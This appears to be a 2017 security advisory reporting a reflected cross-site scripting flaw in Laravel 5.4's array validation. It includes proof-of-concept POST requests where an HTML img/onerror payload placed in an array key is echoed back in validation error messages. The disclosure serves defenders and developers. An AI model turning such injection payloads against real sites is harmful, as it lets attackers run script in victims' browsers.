Laravel 5.4 Cross Site Scripting

Published
Credit
Risk
2017.03.07
MaHDyfo
Low
CWE
CVE
Local
Remote
CWE-79
N/A
No
Yes

# Exploit Title: Laravel non-presistent XSS in validation of arrays
# Date: 06/03/2017
# Exploit Author: MaHDyfo (mahdyfof[the at sign]gmail.com)
# Vendor Homepage: laravel.com
# Version: 5.4

In Laravel validation rules, assume that you set a rule to get an array input.

$this->validate($request, [
'lessons' => 'required|array',
'lessons.*' => 'numeric'
]);

Here we say lessons should be array and the elements should be numeric.
Now let's enter a character there to fail the validation.

POST Request: lessons[]=1&lessons[]=4&lessons[]=abc

It tells {"lessons.2":["The lessons.2 must be a number."]}
That's OK up to here. But what if we place an index for the array.

POST Request: lessons[]=1&lessons[]=4&lessons[example]=abc
Response: {"lessons.example":["The lessons.example must be a number."]}

POST Request: lessons[]=1&lessons[]=4&lessons[<img src=x
onerror='alert(1)'>]=abc
Response: {"lessons.<img src=x onerror='alert(1)'>":["The lessons.<img
src=x onerror='alert(1)'> must be a number."]}
And it executes the alert with no problem...

You can see this bug already exists in Laravel official doc:
https://laravel.com/docs/master/validation#validating-arrays
Maybe the solution is to validate the array values yourself by for
example extending validation rules.

Regards,
MaHDyfo
Iran


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com